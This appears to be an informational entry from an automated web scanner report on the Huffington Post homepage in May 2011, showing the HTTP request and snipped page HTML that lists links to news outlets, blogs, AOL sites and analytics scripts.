<li><a href="http://www.nydailynews.com/topics/Stanley+Crouch" target="_blank">Stanley Crouch</a>
...[SNIP]...
<li><a href="http://www.washingtonpost.com/wp-dyn/content/linkset/2005/04/22/LI2005042201099.html" target="_blank">EJ Dionne</a></li>
<li><a href="http://www.marketwatch.com/News/Story/Story.aspx?column=Jon+Friedman%27s+Media+Web&siteid=mktw&dist=" target="_blank">Jon Friedman</a>
...[SNIP]...
<li><a href="http://www.opinionjournal.com/diary/" target="_blank">John Fund</a></li>
<li><a href="http://www.thedailybeast.com/author/howard-kurtz/" target="_blank">Howard Kurtz</a>
...[SNIP]...
<li><a href="http://www.hitchensweb.com/" target="_blank">Christopher Hitchens</a>
...[SNIP]...
<li><a href="http://www.nationalreview.com/lowry/lowry.asp/" target="_blank">Rich Lowry</a>
...[SNIP]...
<li><a href="http://www.thenation.com/blogs/thebeat " target="_blank">John Nichols</a>
...[SNIP]...
<li><a href="http://online.wsj.com/public/page/peggy-noonan.html" target="_blank">Peggy Noonan</a>
...[SNIP]...
<li><a href="http://slate.msn.com/?id=3944&cp=68090&nav=navom" target="_blank">Jack Shafer</a>
...[SNIP]...
<li><a href="http://blogs.suntimes.com/sweet/" target="_blank">Lynn Sweet</a>
...[SNIP]...
<li><a href="http://www.washingtonpost.com/wp-dyn/content/linkset/2005/03/24/LI2005032402294.html" target="_blank">George Will</a>
...[SNIP]...
<li><a href="http://www.newser.com/off-the-grid/author/16/michael-wolff.html" target="_blank">Michael Wolff</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:138px;">
                   <a href="http://www.autoblog.com/" class="black border_dotted_ccc">AUTOBLOG</a>
...[SNIP]...
</a>
                   <a href="http://music.aol.com/" class="black border_dotted_ccc">MUSIC</a>
                   <a href="http://www.popeater.com/" class="black">POPEATER</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:115px;">
                   <a href="http://moviefone.com/" class="black border_dotted_ccc">MOVIEFONE</a>
                   <a href="http://television.aol.com/" class="black border_dotted_ccc">TV</a>
                   <a href="http://video.aol.com/" class="black">VIDEO</a>
...[SNIP]...
</a>
                   <a href="http://www.engadget.com/" class="black border_dotted_ccc">ENGADGET</a>
                   <a href="http://www.tuaw.com/" class="black">APPLE BLOG</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:120px;">
                   <a href="http://techcrunch.com/" class="black border_dotted_ccc">TECHCRUNCH</a>
                   <a href="http://www.joystiq.com/" class="black border_dotted_ccc">JOYSTIQ</a>
                   <a href="http://translogic.aolautos.com/" class="black">TRANSLOGIC</a>
...[SNIP]...
</a>
                   <a href="http://www.comicsalliance.com/" class="black">COMICS</a>
...[SNIP]...
</a>
                   <a href="http://www.mmafighting.com/" class="black">MMA FIGHTING</a>
...[SNIP]...
</a>
                   <a href="http://www.shelterpop.com/" class="black">HOME/DIY</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:90px;">
                   <a href="http://www.stylelist.com/" class="black border_dotted_ccc">STYLELIST</a>
...[SNIP]...
</a>
                   <a href="http://www.kitchendaily.com" class="black">RECIPES</a>
...[SNIP]...
</a>
                   <a href="http://www.patch.com/" class="black border_dotted_ccc">PATCH</a>
                   <a href="http://www.mapquest.com/" class="black">MAPQUEST</a>
...[SNIP]...
<li class="n_default"><a href="http://www.games.com/">GAMES</a>
...[SNIP]...
<li class="n_default"><a href="http://www.techcrunch.com">TECHCRUNCH</a>
...[SNIP]...
<li><a href="http://sixapart.com">Powered by Movable Type</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6723616&c3=&c4=&c5=front&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<noscript>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-703240h&amp;cg=0&amp;cc=1&amp;ts=noscript" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
<noscript>
<img src="http://vertical-stats.huffpost.com/?-1&&" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
<noscript>
<img src="//pixel.quantserve.com/pixel/p-6fTutip1SMLM2.gif?labels=Home" style="display:none" height="1" width="1" alt="Quantcast" />
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
<a href="#" class="close_modal" onclick="Modal.hideMask('hp_vertical_common_lightbox');return false;">
           <img width="70" height="22" alt="" src="http://s.huffpost.com/images/modal/close-home.gif" />
        </a>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

16.86. http://www.huffingtonpost.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
The response contains the following links to other domains:

Request

GET /?icid=navbar_huffpo_main5 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=30
Date: Thu, 05 May 2011 01:15:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
<link rel="shortcut icon" href="/favicon.ico" />


       <link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=fonts%2Fhelvetica%2Fstylesheet.css%2Chp_modules%2Ftop_nav.css%2Cverticals%2Fhomepage.css%2Cfrontpage.css%2Cbasic.css%2Call_pages.css%2Cverticals%2Fcolor_scheme.css%2Cadd%2Ffront.css%2Cbuttons.css%2Cmost_popular.css&amp;v46770" type="text/css" media="screen" /><link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=commercial.css%2Csnp_friends.css%2Csnn-header.css%2Chp_modules%2Fmodule.splash_slideshow.css%2Chp_modules%2Fmodule.apps_feeds.css%2Chufflists.css%2Csignup_modal.css%2Cdirect_message.css%2Cbadges_v2.css%2Chp_modules%2Ffacebook.css%2Cuser_levels.css%2Ctwitter_splash.css%2Cbing.css%2Cgrouping.css%2Cmodal_frames.css%2Chp_modules%2Fmodule.bubble.css%2Cemail_share.css&amp;v46755" type="text/css" media="screen" />                
       
<link rel="alternate" type="application/rss+xml" title="The Full Feed" href="http://feeds.huffingtonpost.com/huffingtonpost/raw_feed" />
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Wire Services" href="http://www.huffingtonpost.com/wires/full_index.rdf" />
       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Cflashobjectmin.js%2Cjsonmin.js%2Ccookiesmin.js%2Cv%2Fblogroll.js%2Chp_track.js%2Chp_util.js%2Cjquery%2Fcolor.jquery.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cjquery%2Fjquery.jdMenu.js%2Cprovider.js%2Cquickview.js%2Cshare.js%2Cposts.js%2Crefresh.js%2Cmost_popular.js%2Cfacebook.js%2Cgeopromo.js%2Csnproject.js%2Clazyload-min.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Cbalance_columns.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csitemode.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Csplash_slideshow.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Cuser_levels.js%2Ctwitter_splash.js%2Csharer.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Ctwitter%2Ffrontpage.js%2Chptwitter.js%2Capp-feeds.js&amp;v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&amp;v47014"></script>

<!-- core ad call for AOL AdTech -->
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<h1>Using a mobile device? Go to <a href="http://m.huffpost.com">m.huffpost.com</a>
...[SNIP]...
<div class="huffpo_logo_lightbox">
                           <img src="http://s.huffpost.com/images/social-profile/lightbox/huffpo_logo_lightbox_beta.png" width="368" height="36" alt="" />
                       </div>
...[SNIP]...
<div id="huffpo_snn_is_loading" style="width:100%; text-align:center;"><img width="32" height="32" src="http://s.huffpost.com/images/loader.gif" alt="" /></div>
...[SNIP]...
<div id="qr_tab_read_col1" class="column first">
<img class="spinner" alt="" src="http://s.huffpost.com/images/quickview/gear_animation.gif" width="32" height="32" />
</div>
...[SNIP]...
<div id="qr_tab_news_col1" class="column first">
<img class="spinner" alt="" src="http://s.huffpost.com/images/quickview/gear_animation.gif" width="32" height="32" />
</div>
...[SNIP]...
<!--
   
       
-->        
           <img src="http://s.huffpost.com/images/v/logos/logo_homepage_hp.gif?nv3" alt="The Huffington Post" width="660" height="70" />
       
<!--            
       
-->
...[SNIP]...
<li class="center" style="border-right:medium none; width:138px;">
                   <a href="http://www.autoblog.com/" class="black border_dotted_ccc">AUTOBLOG</a>
...[SNIP]...
</a>
                   <a href="http://music.aol.com/" class="black border_dotted_ccc">MUSIC</a>
                   <a href="http://www.popeater.com/" class="black">POPEATER</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:115px;">
                   <a href="http://moviefone.com/" class="black border_dotted_ccc">MOVIEFONE</a>
                   <a href="http://television.aol.com/" class="black border_dotted_ccc">TV</a>
                   <a href="http://video.aol.com/" class="black">VIDEO</a>
...[SNIP]...
</a>
                   <a href="http://www.engadget.com/" class="black border_dotted_ccc">ENGADGET</a>
                   <a href="http://www.tuaw.com/" class="black">APPLE BLOG</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:120px;">
                   <a href="http://techcrunch.com/" class="black border_dotted_ccc">TECHCRUNCH</a>
                   <a href="http://www.joystiq.com/" class="black border_dotted_ccc">JOYSTIQ</a>
                   <a href="http://translogic.aolautos.com/" class="black">TRANSLOGIC</a>
...[SNIP]...
</a>
                   <a href="http://www.comicsalliance.com/" class="black">COMICS</a>
...[SNIP]...
</a>
                   <a href="http://www.mmafighting.com/" class="black">MMA FIGHTING</a>
...[SNIP]...
</a>
                   <a href="http://www.shelterpop.com/" class="black">HOME/DIY</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:90px;">
                   <a href="http://www.stylelist.com/" class="black border_dotted_ccc">STYLELIST</a>
...[SNIP]...
</a>
                   <a href="http://www.kitchendaily.com" class="black">RECIPES</a>
...[SNIP]...
</a>
                   <a href="http://www.patch.com/" class="black border_dotted_ccc">PATCH</a>
                   <a href="http://www.mapquest.com/" class="black">MAPQUEST</a>
...[SNIP]...
<li class="n_default"><a href="http://www.games.com/">GAMES</a>
...[SNIP]...
<li class="n_default"><a href="http://music.aol.com/">AOL MUSIC</a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html" id="entry_id_0" >
                           
                                                                                   <img id="headline_image" class="quickread_link" width="900" height="350" src="http://i.huffpost.com/gen/273980/thumbs/r-BARACK-OBAMA-OSAMA-BIN-LADEN-huge.jpg" />
                                                                                                   </a>
...[SNIP]...
<a href="#" onclick="javascript:window.external.AddToFavoritesBar('http://www.huffingtonpost.com/webslices/?v=home#home_slice', 'Home', 'slice');">
       <img src="http://s.huffpost.com/images/webslice12x12.png" width="12" height="12" alt="IE8 Web Slice" />
   </a>
...[SNIP]...
<div class="float_left" style="width:45px; height:31px; margin:0 5px;"><img src="http://s.huffpost.com/images/v/blog_column.png" width="44" height="31" /></div>
...[SNIP]...
<a href="/arianna-huffington"><img src="http://s.huffpost.com/contributors/arianna-huffington/headshot.jpg" width="45" height="45" alt="Arianna Huffington" /></a>
...[SNIP]...
<h4><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink">Photos Show 3 Dead Men At Bin Laden Compound (GRAPHIC)</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink"><img class="unloaded-image quickread_link" id="image_857719" longdesc="http://i.huffpost.com/gen/273951/thumbs/s-OSAMA-BIN-LADEN-PHOTOS-large300.jpg" alt="Osama Bin Laden Photos" width="300" height="21
...[SNIP]...
<h4 class="subhead"><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink"></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/administration-bin-laden-waterboarding_n_857529.html"><a href="http://www.nytimes.com/2011/05/04/us/politics/04torture.html"><em>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/william-h-mcraven-univers_n_857584.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<span class="afb-icon">
       <img class="apps-feeds_image" alt="Facebook" src="http://s.huffpost.com/images/blank.gif"/>
    </span>
...[SNIP]...
<span class="afb-icon">
                   <img class="apps-feeds_image" alt="Twitter" src="http://s.huffpost.com/images/blank.gif"/>
               </span>
...[SNIP]...
<span class="afb-icon" >
       <img class="apps-feeds_image" alt="Apple" src="http://s.huffpost.com/images/blank.gif"/>
               </span>
...[SNIP]...
<a class="afb-icon" onclick="HPTrack.Module('follow').click('Android');" href="/p/huffingtonpost-android-ap.html" target="_blank">
       <img class="apps-feeds_image" alt="Android" src="http://s.huffpost.com/images/blank.gif"/>
    </a>
...[SNIP]...
<li id="af-blackberry" class="apps-feeds_button">
    <a class="afb-icon" onclick="HPTrack.Module('follow').click('Blackberry');" href="http://appworld.blackberry.com/webstore/content/19143" target="_blank">
       <img class="apps-feeds_image" alt="Blackberry" src="http://s.huffpost.com/images/blank.gif"/>
       </a>
...[SNIP]...
<a class="afb-icon" href="/subscription/" onclick="HPTrack.Module('follow').click('Email'); QuickSubscribeUser.pop2(); return false;" target="_blank">
                   <img class="apps-feeds_image" alt="Email" src="http://s.huffpost.com/images/blank.gif"/>
               </a>
...[SNIP]...
<a class="afb-icon" onclick="HPTrack.Module('follow').click('Rss');" href="/syndication/" target="_blank">
       <img class="apps-feeds_image" alt="Rss" src="http://s.huffpost.com/images/blank.gif"/>
    </a>
...[SNIP]...
<a href="#" id="facebook_promo_link"><img src="http://s.huffpost.com/images/facebook_promo_connect.png?3" class="facebook_promo_connect" width="230" height="44" /></a>
...[SNIP]...
<div class="snn_twitter_loading_img"><img width="32" height="32" src="http://s.huffpost.com/images/loader.gif" alt="" /></div>
...[SNIP]...
<div class="snp_most_popular_entry_image">
       <a href="http://royalwedding.aol.com/2011/05/02/pippa-middleton-boyfriend-engagement/" class="track_lightbox_quickread" onclick="return QV.pop(this); return false;">
                           <img border="0" src="/images/trans.gif" longdesc="http://www.blogcdn.com/royalwedding.aol.com/media/2011/05/pippa10facts_74x58.jpg" alt="" class="img_border unloaded-image" />
...[SNIP]...
<div class="snp_most_popular_entry_desc">
       <a class="arial_13 black bold snp_entry_title track_lightbox_quickread" onclick="return QV.pop(this); return false;" href="http://royalwedding.aol.com/2011/05/02/pippa-middleton-boyfriend-engagement/">AOL Royal Wedding: 10 Things You Should Know About Pippa Middleton</a>
...[SNIP]...
<div class="snp_most_popular_entry_image">
       <a href="http://realestate.aol.com/blog/2011/05/02/real-estate-tough-sell-the-too-custom-home/" class="track_lightbox_quickread" onclick="return QV.pop(this); return false;">
                           <img border="0" src="/images/trans.gif" longdesc="http://www.blogcdn.com/realestate.aol.com/blog/media/2011/05/3843-22nd-st-pool-1304375357_74x58.jpg" alt="" class="img_border unloaded-image" /
...[SNIP]...
<div class="snp_most_popular_entry_desc">
       <a class="arial_13 black bold snp_entry_title track_lightbox_quickread" onclick="return QV.pop(this); return false;" href="http://realestate.aol.com/blog/2011/05/02/real-estate-tough-sell-the-too-custom-home/">AOL Real Estate: Real Estate Tough Sell: The Too-Custom Home</a>
...[SNIP]...
<a href="#" onclick="SayIt.pop_email_form(); return false;">
           <img src="http://s.huffpost.com/images/v/something_to_say_button.png" width="300" height="58" alt="If you have something to say... Say it on the Huffington Post" />
       </a>
...[SNIP]...
<h4><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink">Drunk British Airways Passenger Reportedly Gropes Flight Attendant</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink"><img class="unloaded-image quickread_link" id="image_857316" longdesc="http://i.huffpost.com/gen/274035/thumbs/s-ALCOHOL-large300.jpg" alt="Alcohol" width="300" height="219" src="/images/trans.gif" />
...[SNIP]...
<h4 class="subhead"><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink"></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/panda-peacock-animal-chase_n_857572.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/unemployment-up-divorce-down_n_857503.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<h4><a href="http://aol.com/video/930944537001" target="_hplink">Proof That Some Dogs Can Talk?</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://aol.com/video/930944537001" target="_hplink"><img class="unloaded-image quickread_link" id="image_857475" longdesc="http://i.huffpost.com/gen/273725/thumbs/s-DOG-large300.jpg" alt="Dog" width="300" height="219" src="/images/trans.gif" />
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/03/mac-os-x-tips-tricks_n_855102.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/jon-stewart-rips-pakistan_n_857329.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<li><a href="http://abcnews.go.com/" target="_blank">ABC</a></li>
<li><a href="http://www.accesshollywood.com" target="_blank">Access Hollywood</a>
...[SNIP]...
<li><a href="http://english.aljazeera.net/" target="_blank">Al Jazeera</a>
...[SNIP]...
<li><a href="http://news.aol.com/" target="_blank">AOL News</a>
...[SNIP]...
<li><a href="http://www.theatlantic.com/" target="_blank">The Atlantic</a>
...[SNIP]...
<li><a href="http://news.bbc.co.uk/" target="_blank">BBC</a></li>
<li><a href="http://www.bloomberg.com/" target="_blank">Bloomberg</a></li>
<li><a href="http://www.boston.com/news/globe/" target="_blank">Boston Globe</a>
...[SNIP]...
<li><a href="http://www.c-span.org" target="_blank">C-SPAN</a></li>
<li><a href="http://www.cbsnews.com/" target="_blank">CBS</a></li>
<li><a href="http://www.suntimes.com/" target="_blank">Chicago Sun-Times</a>
...[SNIP]...
<li><a href="http://www.chicagotribune.com/" target="_blank">Chicago Tribune</a>
...[SNIP]...
<li><a href="http://www.csmonitor.com/" target="_blank">Christian Science Monitor</a>
...[SNIP]...
<li><a href="http://www.publicintegrity.org/" target="_blank">Center for Public Integrity</a>
...[SNIP]...
<li><a href="http://www.cnn.com/" target="_blank">CNN</a></li>
<li><a href="http://www.cq.com" target="_blank">Congressional Quarterly</a>
...[SNIP]...
<li><a href="http://www.telegraph.co.uk/" target="_blank">Daily Telegraph</a>
...[SNIP]...
<li><a href="http://www.democracynow.org/" target="_blank">Democracy Now!</a>
...[SNIP]...
<li><a href="http://drudgereport.com/" target="_blank">Drudge Report</a>
...[SNIP]...
<li><a href="http://www.eonline.com/" target="_blank">E! Online</a></li>
<li><a href="http://www.ew.com/" target="_blank">Entertainment Weekly</a>
...[SNIP]...
<li><a href="http://www.forbes.com/" target="_blank">Forbes</a></li>
<li><a href="http://money.cnn.com/magazines/fortune/" target="_blank">Fortune</a>
...[SNIP]...
<li><a href="http://www.foxnews.com/" target="_blank">Fox News</a></li>
<li><a href="http://news.ft.com/home/us" target="_blank">Financial Times</a>
...[SNIP]...
<li><a href="http://www.theglobeandmail.com/" target="_blank">Globe and Mail</a>
...[SNIP]...
<li><a href="http://www.GlobalPost.com" target="_blank">GlobalPost.com</a>
...[SNIP]...
<li><a href="http://www.globalvoicesonline.org/" target="_blank">GlobalVoices</a>
...[SNIP]...
<li><a href="http://news.google.com/" target="_blank">Google News</a>
...[SNIP]...
<li><a href="http://www.guardian.co.uk/" target="_blank">Guardian</a></li>
<li><a href="http://thehill.com/" target="_blank">The Hill</a></li>
<li><a href="http://news.independent.co.uk/" target="_blank">Independent</a>
...[SNIP]...
<li><a href="http://www.latimes.com/" target="_blank">Los Angeles Times</a>
...[SNIP]...
<li><a href="http://www.mcclatchydc.com/" target="_blank">McClatchy</a></li>
<li><a href="http://www.mediaite.com/" target="_blank">Mediaite</a></li>
<li><a href="http://www.linktv.org/mosaic/" target="_blank">Mosaic</a></li>
<li><a href="http://www.motherjones.com/" target="_blank">Mother Jones</a>
...[SNIP]...
<li><a href="http://www.msnbc.msn.com/" target="_blank">MSNBC</a></li>
<li><a href="http://nydailynews.com/" target="_blank">New York Daily News</a>
...[SNIP]...
<li><a href="http://www.observer.com/" target="_blank">New York Observer</a>
...[SNIP]...
<li><a href="http://www.nytimes.com/" target="_blank">New York Times</a>
...[SNIP]...
<li><a href="http://www.npr.org/" target="_blank">NPR</a></li>
<li><a href="http://www.pbs.org/newshour/" target="_blank">PBS NewsHour</a>
...[SNIP]...
<li><a href="http://www.newsweek.com" target="_blank">Newsweek</a></li>
<li><a href="http://www.people.com/people" target="_blank">People</a></li>
<li><a href="http://www.politico.com/" target="_blank">Politico</a></li>
<li><a href="http://www.propublica.org/"target="_blank">ProPublica</a>
...[SNIP]...
<li><a href="http://www.reuters.com/" target="_blank">Reuters</a>
...[SNIP]...
<li><a href="http://www.rollcall.com/" target="_blank">Roll Call</a></li>
<li><a href="http://rollingstone.com" target="_blank">Rolling Stone</a>
...[SNIP]...
<li><a href="http://www.theroot.com" target="_blank">The Root</a></li>
<li><a href="http://www.salon.com/" target="_blank">Salon</a></li>
<li><a href="http://www.sfgate.com/" target="_blank">San Francisco Chronicle</a>
...[SNIP]...
<li><a href="http://www.slate.com/" target="_blank">Slate</a></li>
<li><a href="http://reporting.sunlightfoundation.com/blog/" target="_blank">Sunlight Foundation</a>
...[SNIP]...
<li><a href="http://www.time.com/time/?xid=huffpo-direct" target="_blank">TIME</a></li>
<li><a href="http://www.timesonline.co.uk/section/0,,3,00.html" target="_blank">Times Of London</a>
...[SNIP]...
<li><a href="http://www.tmz.com" target="_blank">TMZ</a></li>
<li><a href="http://www.usatoday.com/" target="_blank">USA Today</a></li>
<li><a href="http://www.vanityfair.com/" target="_blank">Vanity Fair</a>
...[SNIP]...
<li><a href="http://wsj.com/" target="_blank">Wall Street Journal</a>
...[SNIP]...
<li><a href="http://www.washingtonindependent.com/" target="_blank">Washington Independent</a>
...[SNIP]...
<li><a href="http://www.washingtontimes.com/" target="_blank">Washington Times</a>
...[SNIP]...
<li><a href="http://www.washingtonpost.com/" target="_blank">Washington Post</a>
...[SNIP]...
<li><a href="http://news.yahoo.com/" target="_blank">Yahoo! News</a>
...[SNIP]...
<li><a href=http://www.youthradio.org/>Youth Radio</a>
...[SNIP]...
<li><a href="http://americablog.blogspot.com/" target="_blank">Americablog</a>
...[SNIP]...
<li><a href="http://andrewsullivan.theatlantic.com/" target="_blank">Andrew Sullivan</a>
...[SNIP]...
<li><a href="http://www.bagnewsnotes.com/" target="_blank">BagNewsNotes</a>
...[SNIP]...
<li><a href="http://bloggingheads.tv/" target="_blank">Bloggingheads</a>
...[SNIP]...
<li><a href="http://boingboing.net/" target="_blank">Boing Boing</a>
...[SNIP]...
<li><a href="http://bravenewfilms.org/" target="_blank">Brave New Films</a>
...[SNIP]...
<li><a href="http://www.buzzfeed.com/" target="_blank">BuzzFeed</a></li>
<li><a href="http://www.buzzmachine.com/" target="_blank">BuzzMachine</a>
...[SNIP]...
<li><a href="http://www.nationalreview.com/thecorner/corner.asp" target="_blank">The Corner (National Review)</a>
...[SNIP]...
<li><a href="http://mediamatters.org/blog/" target="_blank">County Fair (Media Matters)</a>
...[SNIP]...
<li><a href="http://www.crooksandliars.com/" target="_blank">Crooks and Liars</a>
...[SNIP]...
<li><a href="http://dailycaller.com/" target="_blank">Daily Caller</a>
...[SNIP]...
<li><a href="http://dailykos.com/" target="_blank">Daily Kos</a></li>
<li><a href="http://www.slate.com/blogs/blogs/weigel/" target="_blank">David Weigel</a>
...[SNIP]...
<li><a href="http://democracyarsenal.org/" target="_blank">Democracy Arsenal</a>
...[SNIP]...
<li><a href="http://blogs.reuters.com/felix-salmon/" target="_blank">Felix Salmon</a>
...[SNIP]...
<li><a href="http://firedoglake.com/" target="_blank">Firedoglake</a>
...[SNIP]...
<li><a href="http://fivethirtyeight.blogs.nytimes.com/" target="_blank">FiveThirtyEight</a>
...[SNIP]...
<li><a href="http://www.FrumForum.com" target="_blank">FrumForum</a></li>
<li><a href="http://www.funnyordie.com/" target="_blank">Funny or Die</a>
...[SNIP]...
<li><a href="http://blogs.abcnews.com/george/" target="_blank">George's Bottom Line (George Stephanopoulos)</a>
...[SNIP]...
<li><a href="http://www.gothamist.com" target="_blank">Gothamist</a></li>
<li><a href="http://hotlineblog.nationaljournal.com/" target="_blank">Hotline On Call (National Journal)</a>
...[SNIP]...
<li><a href="http://digbysblog.blogspot.com/">Hullabaloo</a>
...[SNIP]...
<li><a href="http://www.juancole.com/" target="_blank">Informed Comment</a>
...[SNIP]...
<li><a href="http://www.instapundit.com/" target="_blank">Instapundit</a>
...[SNIP]...
<li><a href="http://www.theatlantic.com/james-fallows/" target="_blank">James Fallows</a>
...[SNIP]...
<li><a href="http://www.vanityfair.com/online/wolcott" target="_blank">James Wolcott (Vanity Fair)</a>
...[SNIP]...
<li><a href="http://www.theatlantic.com/joshua-green/" target="_blank">Joshua Green</a>
...[SNIP]...
<li><a href="http://www.newsweek.com/blogs/kausfiles.html" target="_blank">Kausfiles (Newsweek)</a>
...[SNIP]...
<li><a href="http://www.kottke.org/" target="_blank">kottke.org</a>
...[SNIP]...
<li><a href="http://www.kcrw.com/news/programs/lr" target="_blank">Left, Right and Center</a>
...[SNIP]...
<li><a href="http://themoderatevoice.com/" target="_blank">The Moderate Voice</a>
...[SNIP]...
<li><a href="http://www.ndnblog.com" target="_blank">NDN Blog</a></li>
<li><a href="http://www.thenation.com/blogs/notion" target="_blank">The Notion (Nation)</a>
...[SNIP]...
<li><a href="http://www.pandagon.net/" target="_blank">Pandagon</a></li>
<li><a href="http://krugman.blogs.nytimes.com/" target="_blank">Paul Krugman</a>
...[SNIP]...
<li><a href="http://www.washingtonmonthly.com/" target="_blank">Political Animal (Washington Monthly)</a>
...[SNIP]...
<li><a href="http://politicalwire.com/" target="_blank">Political Wire</a>
...[SNIP]...
<li><a href="http://www.rawstory.com" target="_blank">Raw Story</a></li>
<li><a href="http://redstate.com/" target="_blank">Redstate.com</a>
...[SNIP]...
<li><a href="http://www.seeingtheforest.com/" target="_blank">Seeing The Forest</a>
...[SNIP]...
<li><a href="http://time-blog.com/swampland/" target="_blank">Swampland (Time)</a>
...[SNIP]...
<li><a href="http://talkleft.com/" target="_blank">TalkLeft</a></li>
<li><a href="http://www.talkingpointsmemo.com/" target="_blank">Talking Points Memo</a>
...[SNIP]...
<li><a href="http://www.prospect.org/weblog/" target="_blank">Tapped (American Prospect)</a>
...[SNIP]...
<li><a href="http://www.taylormarsh.com/" target="_blank">Taylor Marsh</a>
...[SNIP]...
<li><a href="http://www.thatminoritything.com/" target="_blank">That Minority Thing</a>
...[SNIP]...
<li><a href="http://www.truthdig.com/" target="_blank">Truthdig</a></li>
<li><a href="http://www.thinkprogress.org/" target="_blank">Think Progress</a>
...[SNIP]...
<li><a href="http://www.thismodernworld.com/" target="_blank">This Modern World</a>
...[SNIP]...
<li><a href="http://www.usnews.com/usnews/politics/whispers/whisphome.htm" target="_blank">Washington Whispers (US News & World Report)</a>
...[SNIP]...
<li><a href="http://www.wonkette.com/" target="_blank">Wonkette</a></li>
<li><a href="http://www.theyoungturks.com/" target="_blank">The Young Turks</a>
...[SNIP]...
<li><a href="http://www.thenation.com/authors/eric-alterman" target="_blank">Eric Alterman</a>
...[SNIP]...
<li><a href="http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/davidbrooks/index.html" target="_blank">David Brooks</a>
...[SNIP]...
<li><a href="http://www.nationaljournal.com/columns/political-connections">Ron Brownstein</a>
...[SNIP]...
<li><a href="http://www.observer.com/opinions_conason.asp" target="_blank">Joe Conason</a>
...[SNIP]...
<li><a href="http://www.davidcorn.com" target="_blank">David Corn</a>
...[SNIP]...
<li><a href="http://www.nydailynews.com/topics/Stanley+Crouch" target="_blank">Stanley Crouch</a>
...[SNIP]...
<li><a href="http://www.washingtonpost.com/wp-dyn/content/linkset/2005/04/22/LI2005042201099.html" target="_blank">EJ Dionne</a></li>
